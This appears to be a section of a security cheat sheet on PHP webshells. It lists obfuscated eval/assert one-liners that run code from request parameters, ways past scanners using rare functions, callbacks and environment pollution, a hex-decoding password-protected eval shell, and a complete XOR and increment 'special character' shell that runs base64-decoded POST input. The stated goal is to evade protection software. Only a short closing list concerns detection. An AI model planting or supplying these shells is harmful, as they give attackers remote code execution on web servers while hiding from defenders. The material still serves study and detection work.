5.1.8. WebShell¶
5.1.8.1. Common deformations¶
- GLOBALS
eval($GLOBALS['_POST']['op']);
$_FILEeval($_FILE['name']);
- split
eval(${"_PO"."ST"} ['sz']);
- Dynamic function execution
$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);$a=$_GET['a'];$a($_GET['b']);
- create_function
$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
preg_replace
- deformation
str_replace(” “, “e v a l”)
- Hex conversion
"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
- base operation
("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
- auto increment operation
$a="a";$a++;
- coercion
$a='';$a.=[]; // Array
- use filename
__FILE__
- comment
$a="e"."v"./*-/*-*/"a"./*-*/"l";
- reflection
ReflectionFunction
5.1.8.2. Bypass¶
- Based on rare functions
mb_eregi_replace('.*',$_GET[1],'','e');set_error_handler + trigger_error
- based on pollution
putenv($_GET["c"]);eval(getenv('path'));parse_str
parse_url
extract
token_get_all
define
- Based on rare sources
$a = filter_input(INPUT_GET,'c');eval(end(getallheaders()));get_defined_vars
getallheaders
get_meta_tags
phpinfo
External variable/file information
Overload toString
5.1.8.3. String morphing functions¶
base64_decode
base64_encode
str_replace
str_rot13
strtok
strtolower
strtoupper
strtr
substr
substr_replace
trim
ucfirst
ucwords
5.1.8.4. Callback functions¶
array_filter
array_map
array_reduce
array_walk
array_walk
array_walk_recursive
call_user_func
call_user_func_array
filter_var
filter_var_array
preg_replace_callback
register_tick_function
registregister_shutdown_function
uasort
uksort
5.1.8.5. Encryption and decryption functions¶
mcrypt_encrypt
openssl_encrypt
5.1.8.6. Other implementation methods¶
FFI
SimpleXML
SimpleXMLElement
5.1.8.7. Custom Functions¶
Using a custom encryption and decryption function can bypass the detection and killing of some protection software to a certain extent. The following code is a simple example of execution based on hexadecimal.
$string = '';
$password = 'password';
if(isset($_POST[$password])){
$hex = $_POST[$password];
for($i = 0; $i < strlen($hex) - 1; $i += 2) {
$string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
}
eval($string);
5.1.8.8. Special Character Shell¶
PHP strings can be directly operated when XOR and self-increment operations are performed, so special characters can be used to form Shell.
<?=`{${~"\xa0\xb8\xba\xab"}[~"\xa0"]}`;
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___(base64_decode($_[_]));
5.1.8.9. Detection against adversarial¶
Analysis of Influenced Programs Based on Obfuscation
Influence program execution based on dynamic variables
Throwing an exception to interrupt data flow analysis
Interrupted data flow analysis based on reflection
Interrupting data flow analysis based on passing by reference